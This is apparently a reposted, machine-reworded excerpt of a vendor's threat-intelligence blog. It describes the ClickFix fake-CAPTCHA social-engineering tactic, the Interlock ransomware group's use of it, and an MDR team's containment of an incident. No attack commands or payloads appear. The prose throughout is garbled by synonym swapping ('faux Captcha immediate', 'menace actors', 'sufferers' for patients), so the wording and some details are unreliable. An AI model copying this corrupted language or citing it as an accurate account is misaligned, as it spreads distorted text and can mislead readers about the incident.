[ad_1]
Background
ClickFix has rapidly change into a rampant social-engineering tactic. First noticed again in October 2023, it goals to trick customers into pasting instructions into the run dialog field below the guise of verifying the consumer’s connection and authenticity to the area. Given its ease of use and talent to bypass technical safety measures, adoption of ClickFix has been rising at an alarming charge. [1]
Executive Summary
This investigation started after a consumer was noticed navigating to a professional web site that prompted the consumer with a faux Captcha immediate. Once the Fake Captcha immediate directions had been carried out, a command to a malicious area led to malicious scripts and file downloads on the consumer’s asset.
The Interlock ransomware group was first noticed in September 2024. Unlike most ransomware teams seen right this moment that make use of Ransomware as a Service (RaaS) fashions, this was an unbiased group. They gained notoriety again in October 2024 after they claimed accountability for the Texas Tech University Health Sciences Center incident that compromised the info of roughly 1.5 million sufferers.
In January 2025, researchers at Sekoia noticed Interlock increasing their techniques and leveraging the Social Engineering method now referred to as ClickFix. [2]
Investigation
The Level Blue MDR staff noticed two alarms on the identical endpoint from Sentinel One which prompted additional investigation. During the investigation, our analysts uncovered the menace actors’ techniques, strategies, and procedures (TTPs) and recognized indicators of compromise (IOCs) related to the Interlock ransomware group. Due to the swift motion of the LevelBlue MDR staff, the assault was contained, and the hashes from the investigation have been added to the blocklist inside SentinelOne.
Read the total weblog and study key takeaways from LevelBlue’s investigation, together with suggestions to stop these assaults from affecting your group.
[2] https://blog.sekoia.io/interlock-ransomware-evolving-under-the-radar
The content material offered herein is for common informational functions solely and shouldn’t be construed as authorized, regulatory, compliance, or cybersecurity recommendation. Organizations ought to seek the advice of their very own authorized, compliance, or cybersecurity professionals relating to particular obligations and danger administration methods. While LevelBlue’s Managed Threat Detection and Response options are designed to help menace detection and response on the endpoint stage, they aren’t an alternative choice to complete community monitoring, vulnerability administration, or a full cybersecurity program.